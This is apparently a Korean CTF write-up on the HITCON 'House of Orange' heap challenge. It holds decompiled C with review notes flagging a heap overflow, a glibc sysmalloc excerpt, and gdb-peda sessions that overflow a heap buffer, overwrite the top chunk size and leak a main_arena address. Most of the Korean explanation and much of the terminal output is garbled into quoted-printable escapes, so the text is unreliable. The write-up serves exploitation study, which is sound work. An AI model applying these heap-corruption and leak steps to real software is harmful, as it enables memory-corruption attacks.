My teammate, Orange, need a house. Can you build it ?
nc 52.68.192.99 56746
hourseoforange
libc.so.6
autolyc= os@ubuntu:~/CTF/HITCON/houseoforange$ file ./houseoforange_22785bece84189e6= 32567da38e4be0e0c4bb1682=20 ./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682: ELF 64-bit LSB s= hared object, x86-64, version 1 (SYSV), dynamically linked (uses shared lib= s), for GNU/Linux 2.6.32, BuildID[sha1]=3Da58bda41b65d38949498561b0f2b976ce= 5c0c301, stripped autolycos@ubuntu:~/CTF/HITCON/houseoforange$ checksec.sh --file ./houseofor= ange_22785bece84189e632567da38e4be0e0c4bb1682=20 RELRO STACK CANARY NX PIE RPATH = RUNPATH FILE Full RELRO Canary found NX enabled PIE enabled No RPATH = No RUNPATH ./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682 autolycos@ubuntu:~/CTF/HITCON/houseoforange$
autolyc= os@ubuntu:~/CTF/HITCON/houseoforange$ ./houseoforange_22785bece84189e632567= da38e4be0e0c4bb1682=20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice :
Your ch= oice : 1 Length of name :10 Name :AAAAAAAAAA Price of Orange:+++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange:1 Finish
Your ch= oice : 2 Name of house : AAAAAAAAAA Price of orange : 0 __ =20 \/.--, =20 //_.' =20 .-""-/""----.. =20 / . . . . . . . \ =20 / . . . . . . . . \ =20 |. =CF=89=CF=89=CF=89=CF=89 . .=CF=89=CF=89=CF=89=CF=89. | =20 \ . $$. . . $$. ..| =20 \. . . . . . . . ./ =20 \ . . . O . . . / =20 '-.__.__.__._-'
Your ch= oice : 3 Length of name :20 Name:BBBBBBBBBBBBBBBBBBBB Price of Orange: +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange: 2 Finish
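/*
 * Entry point of the challenge binary as reconstructed by the decompiler
 * (quoted-printable residue such as "=3D" removed so the listing reads as C).
 *
 * Endless menu loop that dispatches on the number returned by UserInput():
 *   1 -> BuildTheHouse()
 *   2 -> SeeTheHouse()
 *   3 -> UpgradeTheHouse()
 *   4 -> prints "give up" and exits with status 0
 *   anything else -> prints "Invalid choice" and shows the menu again
 * The three parameters are the decompiler's placeholders; this body does not
 * use them.
 */
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  signed int menuNumber; // eax@2

  // Helper not shown on this page; the name is the analyst's. Presumably it
  // arms the alarm timer (the gdb session later reports SIGALRM) -- confirm.
  setSIGALE();
  while ( 1 )
  {
    // Inner loop: option 2 is handled here and goes straight back to the menu.
    while ( 1 )
    {
      PrintMenu();
      menuNumber = UserInput();
      if ( menuNumber != 2 )
        break;
      SeeTheHouse();
    }
    if ( menuNumber > 2 )
    {
      if ( menuNumber == 3 )
      {
        UpgradeTheHouse();
      }
      else
      {
        if ( menuNumber == 4 )
        {
          puts("give up");
          exit(0);
        }
        // Shared by every value above 4 and, via the goto below, by every
        // value below 1.
LABEL_14:
        puts("Invalid choice");
      }
    }
    else
    {
      if ( menuNumber != 1 )
        goto LABEL_14;
      BuildTheHouse();
    }
  }
}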
=EC=A0=84=EC=97=AD =EB=B3=80=EC=88=98 gHouseCount=EC=9D=98 =EA= =B0=92=EC=9D=B4 3=EB=B3=B4=EB=8B=A4 =ED=81=B0 =EA=B0=92=EC=9D=B8=EC=A7=80 = =ED=99=95=EC=9D=B8=ED=95=A9=EB=8B=88=EB=8B=A4.
=ED=95=B4=EB=8B=B9 =EB=B3=80=EC=88=98=EB=A5=BC =EC=9D=B4=EC=9A=A9=ED= =95=B4 =ED=95=B4=EB=8B=B9 =ED=95=A8=EC=88=98=EB=A5=BC 4=EB=B2=88=EB=A7=8C = =EC=82=AC=EC=9A=A9 =EA=B0=80=EB=8A=A5=ED=95=98=EB=8F=84=EB=A1=9D =ED=95=A9= =EB=8B=88=EB=8B=A4.
HOUSE =EA=B5=AC=EC=A1=B0=EC=B2=B4=EC=9D=98 Heap =EA=B3=B5=EA=B0=84= =EC=9D=84 =ED=95=A0=EB=8B=B9=ED=95=A9=EB=8B=88=EB=8B=A4.
=EC=82=AC=EC=9A=A9=EC=9E=90=EB=A1=9C =EB=B6=80=ED=84=B0 =EC=9E=85=EB= =A0=A5=ED=95=A0 =EC=9D=B4=EB=A6=84=EC=9D=98 =EA=B8=B8=EC=9D=B4=EB=A5=BC =EC= =9E=85=EB=A0=A5=EB=B0=9B=EC=8A=B5=EB=8B=88=EB=8B=A4.
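/*
 * Menu option 1: allocate a new house record and make it the current one.
 *
 * Reads a name length, a name, a price and a colour from the user, stores
 * them in freshly allocated heap objects and publishes the record through the
 * global gHouseDate. Returns the value of puts("Finish"); the error paths
 * below end the process with exit(1).
 *
 * NOTE(review): the clamped `size` is passed to malloc() and NameInput() and
 * then discarded. The record keeps only the pointer, so nothing later in the
 * program can tell how large the name buffer is; UpgradeTheHouse() writes to
 * the same buffer with a length of its own.
 */
int BuildTheHouse()
{
  unsigned int size; // [rsp+8h] [rbp-18h]@4
  signed int colorNumber; // [rsp+Ch] [rbp-14h]@9
  HOUSE *houseData; // [rsp+10h] [rbp-10h]@4
  INFO *info; // [rsp+18h] [rbp-8h]@9

  // The counter is tested here and incremented at the end, so the function
  // can run to completion four times (counter values 0..3).
  if ( gHouseCount > 3u )
  {
    puts("Too many house");
    exit(1);
  }
  // NOTE(review): unlike the name allocation below, this result is
  // dereferenced without a NULL check.
  houseData = (HOUSE *)malloc(0x10uLL);
  printf("Length of name :");
  size = UserInput();
  // Upper bound only; `size` is unsigned, so any value from 0 to 4096 passes.
  if ( size > 4096 )
    size = 4096;
  // malloc() does not clear the buffer: bytes left by an earlier use of this
  // memory stay in place wherever NameInput() does not overwrite them.
  houseData->name = (char *)malloc(size);
  if ( !houseData->name )
  {
    puts("Malloc error !!!");
    exit(1);
  }
  printf("Name :");
  NameInput(houseData->name, size);
  // NOTE(review): calloc() result is also used without a NULL check.
  info = (INFO *)calloc(1uLL, 8uLL);
  // The format string has no conversion, so the second argument is ignored;
  // presumably a register value the decompiler picked up.
  printf("Price of Orange:", 8LL);
  info->price = UserInput();
  colorPrint();
  printf("Color of Orange:");
  colorNumber = UserInput();
  // Accepted values: the menu entries 1..7 and the special value 56746.
  if ( colorNumber != 56746 && (colorNumber <= 0 || colorNumber > 7) )
  {
    puts("No such color");
    exit(1);
  }
  if ( colorNumber == 56746 )
    info->color = 56746;
  else
    info->color = colorNumber + 30;  // 31..37, the range SeeTheHouse() accepts
  houseData->house = info;
  // The previous record, if any, is simply replaced; this function never
  // calls free().
  gHouseDate = houseData;
  ++gHouseCount;
  return puts("Finish");
}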
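/*
 * One house record. BuildTheHouse() allocates it with malloc(0x10): two
 * pointers on the x86-64 target.
 *
 * NOTE(review): there is no field for the length of the `name` buffer, so
 * code that writes to `name` later has nothing to bound the write against.
 */
struct HOUSE
{
  struct INFO *house;  // price/colour record, see struct INFO
  char *name;          // heap buffer whose size the user chose at build time
};

/*
 * Price and colour of the orange. BuildTheHouse() allocates it with
 * calloc(1, 8): two 4-byte ints.
 */
struct INFO
{
  int price;  // value entered at the "Price of Orange" prompt
  int color;  // 56746, or the menu colour 1..7 plus 30 (31..37)
};

/* The function listings name these types without the `struct` keyword. */
typedef struct HOUSE HOUSE;
typedef struct INFO INFO;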
"gHouseDate->house->color"=EC=9D=98 =EA=B0=92=EC=9D=84 =ED=99= =95=EC=9D=B8=ED=95=A9=EB=8B=88=EB=8B=A4.
"56746"=EA=B3=BC =EA=B0=99=EB=8B=A4=EB=A9=B4 orange =EC=83=89=EC=9D= =98 orange=EA=B0=80 =EC=B6=9C=EB=A0=A5=EB=90=A9=EB=8B=88=EB=8B=A4.
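/*
 * Menu option 2: print the current house (name, price, one ASCII-art orange).
 *
 * Returns the value of the last printf(), or of puts() when no house exists.
 * Exits with status 1 when the stored colour is neither 56746 nor in 31..37.
 *
 * NOTE(review): the name is printed with "%s", which reads until the first
 * NUL byte. The buffer comes from malloc() in BuildTheHouse() (not zeroed),
 * and whether NameInput() terminates the string is not visible on this page;
 * the transcripts here show bytes beyond the typed name being printed.
 * Zeroing the buffer at allocation or terminating it at the number of bytes
 * actually read would keep stale heap contents out of the output.
 */
int SeeTheHouse()
{
  int v0; // eax@3
  int result; // eax@3
  int v2; // eax@8

  if ( !gHouseDate )
    return puts("No such house !");
  if ( gHouseDate->house->color == 56746 )
  {
    // Special colour value: fixed escape sequence "01;38;5;214".
    printf("Name of house : %s\n", gHouseDate->name);
    printf("Price of orange : %d\n", gHouseDate->house->price);
    v0 = rand();
    result = printf("\x1B[01;38;5;214m%s\x1B[0m\n", gOrangeImageArr[v0 % 8]);
  }
  else
  {
    // Anything outside 31..37 cannot have been stored by the build/upgrade
    // code paths, so the program treats it as corruption and stops.
    if ( gHouseDate->house->color <= 30 || gHouseDate->house->color > 37 )
    {
      puts("Color corruption!");
      exit(1);
    }
    printf("Name of house : %s\n", gHouseDate->name);
    printf("Price of orange : %d\n", gHouseDate->house->price);
    v2 = rand();
    // The stored colour is inserted into the escape sequence as a number.
    result = printf("\x1B[%dm%s\x1B[0m\n", (unsigned int)gHouseDate->house->color, gOrangeImageArr[v2 % 8]);
  }
  return result;
}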
=EC=A0=84=EC=97=AD =EB=B3=80=EC=88=98 gUpgradeCount=EC=9D=98 =EA=B0= =92=EC=9D=B4 2=EB=B3=B4=EB=8B=A4 =ED=81=B0=EC=A7=80 =ED=99=95=EC=9D=B8=ED= =95=A9=EB=8B=88=EB=8B=A4.
=EC=A0=84=EC=97=AD =EB=B3=80=EC=88=98 gHouseDate=EC=97=90 =EB=8D=B0= =EC=9D=B4=ED=84=B0=EA=B0=80 =EC=9E=88=EC=9C=BC=EB=A9=B4 =EC=82=AC=EC=9A=A9= =EC=9E=90=EB=A1=9C =EB=B6=80=ED=84=B0 =EA=B0=92=EC=9D=84 =EC=9E=85=EB=A0=A5= =EB=B0=9B=EC=8A=B5=EB=8B=88=EB=8B=A4.
gUpgradeCount =EB=B3=80=EC=88=98=EC=9D=98 =EA=B0=92=EC=9D=84 =EC=A6= =9D=EA=B0=80 =EC=8B=9C=ED=82=B5=EB=8B=88=EB=8B=A4.
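/*
 * Menu option 3: overwrite the name, price and colour of the current house.
 *
 * Returns the value of puts(); exits with status 1 on an invalid colour.
 *
 * NOTE(review): heap-based buffer overflow (CWE-122). `size` is read from the
 * user again and only clamped to 4096; it is never compared with the length
 * passed to malloc() in BuildTheHouse(), and the record holds no such length.
 * NameInput() therefore gets a limit of up to 4096 for a buffer that may be
 * much smaller -- the memory dumps on this page show the write running past
 * the original allocation into the neighbouring chunks. Closing this needs
 * the allocation length kept in the record and `size` clamped to it (or the
 * buffer reallocated) before NameInput() is called.
 */
int UpgradeTheHouse()
{
  INFO *info; // rbx@7
  unsigned int size; // [rsp+8h] [rbp-18h]@5
  signed int colorNumber; // [rsp+Ch] [rbp-14h]@7

  // Tested here and incremented at the end: three upgrades at most.
  if ( gUpgradeCount > 2u )
    return puts("You can't upgrade more");
  if ( !gHouseDate )
    return puts("No such house !");
  printf("Length of name :");
  size = UserInput();
  // Same upper bound as in BuildTheHouse(), but unrelated to the size of the
  // existing buffer.
  if ( size > 4096 )
    size = 4096;
  printf("Name:");
  // Writes into the buffer allocated at build time; see NOTE(review) above.
  NameInput(gHouseDate->name, size);
  // The format string has no conversion, so `size` is ignored here;
  // presumably a register value the decompiler picked up.
  printf("Price of Orange: ", size);
  info = gHouseDate->house;
  info->price = UserInput();
  colorPrint();
  printf("Color of Orange: ");
  colorNumber = UserInput();
  // Accepted values: the menu entries 1..7 and the special value 56746.
  if ( colorNumber != 56746 && (colorNumber <= 0 || colorNumber > 7) )
  {
    puts("No such color");
    exit(1);
  }
  if ( colorNumber == 56746 )
    gHouseDate->house->color = 56746;
  else
    gHouseDate->house->color = colorNumber + 30;  // 31..37
  ++gUpgradeCount;
  return puts("Finish");
}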
0x555555554daa : BuildTheHouse= () =ED=95=A8=EC=88=98=EC=97=90=EC=84=9C "Name" =EA=B0=92=EC=9D=84 =EC=A0=80= =EC=9E=A5=ED=95=A0 Heap=EC=9D=84 =ED=95=A0=EB=8B=B9 =ED=9B=84= p>
0x555555555119 : UpgradeT= heHouse()=ED=95=A8=EC=88=98=EC=97=90=EC=84=9C NameInput() =ED=95=A8=EC= =88=98 =ED=98=B8=EC=B6=9C =EC=A0=84
0x55555555511e : UpgradeTheHouse()=ED=95=A8=EC=88=98=EC=97=
=90=EC=84=9C NameInput() =ED=95=A8=EC=88=98 =ED=98=B8=EC=B6=9C =ED=9B=
=84
autolyc= os@ubuntu:~/CTF/HITCON/houseoforange$ gdb -q ./houseo* Reading symbols from ./houseoforange_22785bece84189e632567da38e4be0e0c4bb16= 82...(no debugging symbols found)...done. gdb-peda$ b *0x555555554daa Breakpoint 1 at 0x555555554daa gdb-peda$ b *0x555555554dfe Breakpoint 2 at 0x555555554dfe gdb-peda$ b *0x555555554e0d Breakpoint 3 at 0x555555554e0d gdb-peda$ b *0x555555555119 Breakpoint 4 at 0x555555555119 gdb-peda$ b *0x55555555511e Breakpoint 4 at 0x55555555511e gdb-peda$
(gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/autolycos/CTF/HITCON/houseoforange/houseoforange_22= 785bece84189e632567da38e4be0e0c4bb1682=20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 1 Length of name :10 Breakpoint 1, 0x0000555555554daa in ?? () gdb-peda$ i r rax rax 0x555555758030=090x555555758030 gdb-peda$ x/8gx 0x555555758030 0x555555758030:=090x0000000000000000=090x0000000000000000 0x555555758040:=090x0000000000000000=090x0000000000020fc1 0x555555758050:=090x0000000000000000=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. Name :AAAAAAAAA Breakpoint 2, 0x0000555555554dfe in ?? () gdb-peda$ x/8gx 0x555555758030 0x555555758030:=090x4141414141414141=090x0000000000000a41 0x555555758040:=090x0000000000000000=090x0000000000020fc1 0x555555758050:=090x0000000000000000=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. Breakpoint 3, 0x0000555555554e0d in ?? () gdb-peda$ x/8gx 0x555555758030 0x555555758030:=090x4141414141414141=090x0000000000000a41 0x555555758040:=090x0000000000000000=090x0000000000000021 0x555555758050:=090x0000000000000000=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000020fa1 gdb-peda$ c
0x555555758030 ~ 0x55555575806C 영역에 입력한 문자열이 저장되어 있습니다.
0x555555758050 영역에는 price,color 값이 저장됩니다.
gdb-ped= a$ c Continuing. Price of Orange:100 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange:1 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 3 Length of name :60 Name: Breakpoint 4, 0x0000555555555119 in ?? () gdb-peda$ x/8gx 0x555555758030 0x555555758030:=090x4141414141414141=090x0000000000000a41 0x555555758040:=090x0000000000000000=090x0000000000000021 0x555555758050:=090x0000001f00000064=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000020fa1 gdb-peda$ ni BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCC Breakpoint 5, 0x000055555555511e in ?? () gdb-peda$ x/8gx 0x555555758030 0x555555758030:=090x4242424242424242=090x4242424242424242 0x555555758040:=090x4242424242424242=090x4242424242424242 0x555555758050:=090x4242424242424242=090x4242424242424242 0x555555758060:=090x4343434343424242=090x000000000a434343 gdb-peda$
sysmalloc()=EC=9D=80 =EC=83= =88=EB=A1=9C=EC=9A=B4 =EC=98=81=EC=97=AD=EC=9D=84 =ED=95=A0=EB=8B=B9=ED=95= =98=EA=B8=B0 =EC=9C=84=ED=95=B4=EC=84=9C=EB=8A=94 Top chunk=EC=9D=98 =EA=B0= =92=EC=9D=84 =ED=99=95=EC=9D=B8=ED=95=A9=EB=8B=88=EB=8B=A4.=
Top chunk =EB=B3=80=EC=A1=B0=EB=A5=BC =ED=86=B5=ED=95= =B4 =EC=83=88=EB=A1=9C=EC=9A=B4 =EB=A9=94=EB=AA=A8=EB=A6=AC =EC=98=81=EC=97= =AD=EC=9D=84 =ED=95=A0=EB=8B=B9=EB=B0=9B=EA=B8=B0 =EC=9C=84=ED=95=B4 =EB=8B= =A4=EC=9D=8C=EA=B3=BC =EA=B0=99=EC=9D=80 =EC=A1=B0=EA=B1=B4=EC=9D=84 =EB=A7= =8C=EC=A1=B1=EC=8B=9C=EC=BC=9C=EC=95=BC =ED=95=A9=EB=8B=88=EB=8B=A4.
MINSIZE (0x10)=EB=B3=B4=EB=8B=A4 =EC=BB=A4=EC=95=BC =ED=95=A9=EB=8B= =88=EB=8B=A4. (unsigned long) (old_size) >=3D MINSIZE
need size + MINSIZE =EB=B3=B4=EB=8B=A4 =EC=9E=91=EC=95=84=EC=95=BC = =ED=95=A9=EB=8B=88=EB=8B=A4. (unsigned long) (old_size) < (unsigned long= ) (nb + MINSIZE))
prev_inuse=EA=B0=80 =EC=84=A4=EC=A0=95=EB=90=98=EC=96=B4 =EC=9E=88= =EC=96=B4=EC=95=BC =ED=95=A9=EB=8B=88=EB=8B=A4. prev_inuse (old_top)
old_top +oldsize =ED=8E=98=EC=9D=B4=EC=A7=80=EB=A5=BC =EC=A0=95= =EB=A0=AC=ED=95=B4=EC=95=BC=ED=95=A9=EB=8B=88=EB=8B=A4.
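/* Excerpt from glibc's sysmalloc() as quoted on this page: the consistency
   checks applied to the current top chunk before the heap is extended.
   Quoted-printable residue ("=3D", split tokens) has been removed. */

/* If not the first time through, we require old_size to be
   at least MINSIZE and to have prev_inuse set. */

assert ((old_top == initial_top (av) && old_size == 0) ||
        ((unsigned long) (old_size) >= MINSIZE &&
         prev_inuse (old_top) &&
         /* the end of the top chunk must sit on a page boundary */
         ((unsigned long) old_end & (pagesize - 1)) == 0));

/* Precondition: not enough current space to satisfy nb request */
assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));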
0x555555554daa : BuildThe= House() =ED=95=A8=EC=88=98=EC=97=90=EC=84=9C "Name" =EA=B0=92=EC=9D=84 =EC= =A0=80=EC=9E=A5=ED=95=A0 Heap=EC=9D=84 =ED=95=A0=EB=8B=B9 =ED=9B=84
0x555555554e0d : BuildThe= House() =ED=95=A8=EC=88=98=EC=97=90=EC=84=9C calloc() =ED=95=A8=EC=88= =98 =ED=98=B8=EC=B6=9C =ED=9B=84
0x55555555511e : UpgradeTheHouse()=ED=95=A8=EC=88=98=EC=97= =90=EC=84=9C NameInput() =ED=95=A8=EC=88=98 =ED=98=B8=EC=B6=9C =ED=9B= =84
gdb-ped= a$ b *0x555555554000 + 0xDAA Breakpoint 1 at 0x555555554daa gdb-peda$ b *0x555555554000 + 0xDFE Breakpoint 2 at 0x555555554dfe gdb-peda$ b *0x555555554000 + 0xE0D Breakpoint 3 at 0x555555554e0d gdb-peda$ b *0x555555554000 + 0x111E Breakpoint 4 at 0x55555555511e gdb-peda$
gdb-ped= a$ r Starting program: /home/lazenca0x0/CTF/HITCON/houseoforange/houseoforange= =20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 1 Length of name :16 Breakpoint 1, 0x0000555555554daa in ?? () gdb-peda$ i r rax rax 0x555555758030=090x555555758030 gdb-peda$ x/16gx 0x555555758030 0x555555758030:=090x0000000000000000=090x0000000000000000 0x555555758040:=090x0000000000000000=090x0000000000020fc1 0x555555758050:=090x0000000000000000=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000000000 0x555555758070:=090x0000000000000000=090x0000000000000000 0x555555758080:=090x0000000000000000=090x0000000000000000 0x555555758090:=090x0000000000000000=090x0000000000000000 0x5555557580a0:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. Program received signal SIGALRM, Alarm clock. Name :AAAAAAAAAAAABB Breakpoint 2, 0x0000555555554dfe in ?? () gdb-peda$ x/16gx 0x555555758030 0x555555758030:=090x4141414141414141=090x000a424241414141 0x555555758040:=090x0000000000000000=090x0000000000020fc1 0x555555758050:=090x0000000000000000=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000000000 0x555555758070:=090x0000000000000000=090x0000000000000000 0x555555758080:=090x0000000000000000=090x0000000000000000 0x555555758090:=090x0000000000000000=090x0000000000000000 0x5555557580a0:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing. Breakpoint 3, 0x0000555555554e0d in ?? 
() gdb-peda$ x/16gx 0x555555758030 0x555555758030:=090x4141414141414141=090x000a424241414141 0x555555758040:=090x0000000000000000=090x0000000000000021 0x555555758050:=090x0000000000000000=090x0000000000000000 0x555555758060:=090x0000000000000000=090x0000000000020fa1 0x555555758070:=090x0000000000000000=090x0000000000000000 0x555555758080:=090x0000000000000000=090x0000000000000000 0x555555758090:=090x0000000000000000=090x0000000000000000 0x5555557580a0:=090x0000000000000000=090x0000000000000000 gdb-peda$
gdb-ped= a$ c Continuing. Price of Orange:100 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange:1 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 3 Length of name :70 Name:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBB Breakpoint 4, 0x000055555555511e in ?? () gdb-peda$ x/16gx 0x555555758030 0x555555758030:=090x4141414141414141=090x4141414141414141 0x555555758040:=090x4141414141414141=090x4141414141414141 0x555555758050:=090x4141414141414141=090x4141414141414141 0x555555758060:=090x4141414141414141=090x0a42424241414141 0x555555758070:=090x0000000000000000=090x0000000000000000 0x555555758080:=090x0000000000000000=090x0000000000000000 0x555555758090:=090x0000000000000000=090x0000000000000000 0x5555557580a0:=090x0000000000000000=090x0000000000000000 gdb-peda$ set *0x555555758068 =3D 0xfa1 gdb-peda$ set *0x55555575806c =3D 0x0 gdb-peda$ x/16gx 0x555555758030 0x555555758030:=090x4141414141414141=090x4141414141414141 0x555555758040:=090x4141414141414141=090x4141414141414141 0x555555758050:=090x4141414141414141=090x4141414141414141 0x555555758060:=090x4141414141414141=090x0000000000000fa1 0x555555758070:=090x0000000000000000=090x0000000000000000 0x555555758080:=090x0000000000000000=090x0000000000000000 0x555555758090:=090x0000000000000000=090x0000000000000000 0x5555557580a0:=090x0000000000000000=090x0000000000000000 gdb-peda$
0x55f72a512010 =3D =ED=95=A0=EB=8B= =B9=EB=90=9C heap=EC=9D=98 =EC=8B=9C=EC=9E=91 =EC=A3=BC=EC=86=8C(0x55f= 72a511010) + heap size(0x1000, 4096)
gdb-ped= a$ c Continuing. Price of Orange: 200 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange: 2 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 1 Length of name :4096 Breakpoint 1, 0x0000555555554daa in ?? () gdb-peda$ i r rax rax 0x555555779010=090x555555779010 gdb-peda$ x/16gx 0x555555758030 0x555555758030:=090x4141414141414141=090x4141414141414141 0x555555758040:=090x4141414141414141=090x4141414141414141 0x555555758050:=090x00000020000000c8=090x4141414141414141 0x555555758060:=090x4141414141414141=090x0000000000000021 0x555555758070:=090x000000000000000a=090x0000000000000000 0x555555758080:=090x0000000000000000=090x0000000000000f61 0x555555758090:=090x00007ffff7dd1b78=090x00007ffff7dd1b78 0x5555557580a0:=090x0000000000000000=090x0000000000000000 gdb-peda$
"0x5555557580d0", "0x5555557580d8"=EC=98=81=EC=97=AD=EC=97=90 main_a= rena =EC=98=81=EC=97=AD=EC=9D=98 =EC=A3=BC=EC=86=8C=EA=B0=80 =EC=A0=80=EC= =9E=A5=EB=90=98=EC=96=B4 =EC=9E=88=EC=8A=B5=EB=8B=88=EB=8B=A4.
gdb-ped= a$ c Continuing. Name :HEAP Breakpoint 2, 0x0000555555554dfe in ?? () gdb-peda$ c Continuing. Breakpoint 3, 0x0000555555554e0d in ?? () gdb-peda$ c Continuing. Price of Orange:300 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange:3 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 1 Length of name :1024 Breakpoint 1, 0x0000555555554daa in ?? () gdb-peda$ i r rax rax 0x5555557580d0=090x5555557580d0 gdb-peda$ x/10gx 0x5555557580d0 0x5555557580d0:=090x00007ffff7dd2188=090x00007ffff7dd2188 0x5555557580e0:=090x00005555557580c0=090x00005555557580c0 0x5555557580f0:=090x0000000000000000=090x0000000000000000 0x555555758100:=090x0000000000000000=090x0000000000000000 0x555555758110:=090x0000000000000000=090x0000000000000000 gdb-peda$ x/gx 0x00007ffff7dd2188 0x7ffff7dd2188 <main_arena+1640>:=090x00007ffff7dd2178 gdb-peda$
Leak data : ?!???
gdb-ped= a$ c Continuing. Name :LEAKADD Breakpoint 2, 0x0000555555554dfe in ?? () gdb-peda$ x/10gx 0x5555557580d0 0x5555557580d0:=090x0a4444414b41454c=090x00007ffff7dd2188 0x5555557580e0:=090x00005555557580c0=090x00005555557580c0 0x5555557580f0:=090x0000000000000000=090x0000000000000000 0x555555758100:=090x0000000000000000=090x0000000000000000 0x555555758110:=090x0000000000000000=090x0000000000000000 gdb-peda$ c Continuing Breakpoint 3, 0x0000555555554e0d in ?? () gdb-peda$ c Continuing. Price of Orange:400 +++++++++++++++++++++++++++++++++++++ 1. Red =20 2. Green =20 3. Yellow =20 4. Blue =20 5. Purple =20 6. Cyan =20 7. White =20 +++++++++++++++++++++++++++++++++++++ Color of Orange:4 Finish +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice : 2 Name of house : LEAKADD ?!??? Price of orange : 400 __ =20 \/.--, =20 //_.' =20 .-""-/""----.. =20 / . . . . . . . \ =20 / . . \ . . / . . \ =20 |. ____\ . /____. | =20 \ . . . . . . . . | =20 \. . . . . . . . ./ =20 \ . . . =EF=BD=9E . . ./ =20 '-.__.__.__._-' =20 +++++++++++++++++++++++++++++++++++++ @ House of Orange @ +++++++++++++++++++++++++++++++++++++ 1. Build the house =20 2. See the house =20 3. Upgrade the house =20 4. Give up =20 +++++++++++++++++++++++++++++++++++++ Your choice :
"0x5555557580d0"=EC=9C=BC=EB=A1=9C =EB= =B6=80=ED=84=B0 16 byte =EB=96=A8=EC=96=B4=EC=A7=84=EA=B3=B3=EC=97=90 Heap= =EC=9D=98 =EC=A3=BC=EC=86=8C=EA=B0=80 =EC=A1=B4=EC=9E=AC=ED=95=A9=EB=8B=88= =EB=8B=A4.
=EC=9D=B4=EB=A5=BC Leak=ED=95=98=EA=B8= =B0 =EC=9C=84=ED=95=B4 "Name"=EC=9D=98 =EA=B0=92=EC=9C=BC=EB=A1=9C =EB=AC= =B8=EC=9E=90 15=EB=A5=BC =EC=9E=85=EB=A0=A5=ED=95=A9=EB=8B=88=EB=8B=A4.
